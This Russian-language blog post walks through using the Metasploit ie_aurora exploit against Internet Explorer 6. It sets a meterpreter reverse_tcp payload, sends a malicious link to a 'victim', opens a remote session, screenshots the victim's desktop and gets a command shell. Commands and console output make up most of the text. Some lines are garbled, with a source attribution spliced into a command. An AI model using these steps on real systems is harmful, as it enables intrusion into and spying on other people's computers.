Модуль функционирует в данный момент только с IE6.
Для начала создадим ядовитую ссылку. Запускаем консоль и вводим :
msf > use exploit/windows/browser/ie_auroraОтправляем нашу полученную ссылку (http://192.168.0.151:8080/) жертве. Не закрывайте консоль. Если эксплоит прокатил мы должны увидеть в консоли MSF:
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST(your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.
msf exploit(ie_aurora) >
[*] Sending stage (723456 bytes)IP жертвы 192.168.0.166.
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
Начинаем сессию:
msf exploit(ie_aurora) > sessions -i 1Поздравляем, мы внутри!
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP\Developer
Просто для прикола возьмем скриншот рабочего стола машины жертвы:
meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot aurora.bmp
meterpreter > shellextrait de metasloit.com
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Developer\Desktop>
Aucun commentaire:
Enregistrer un commentaire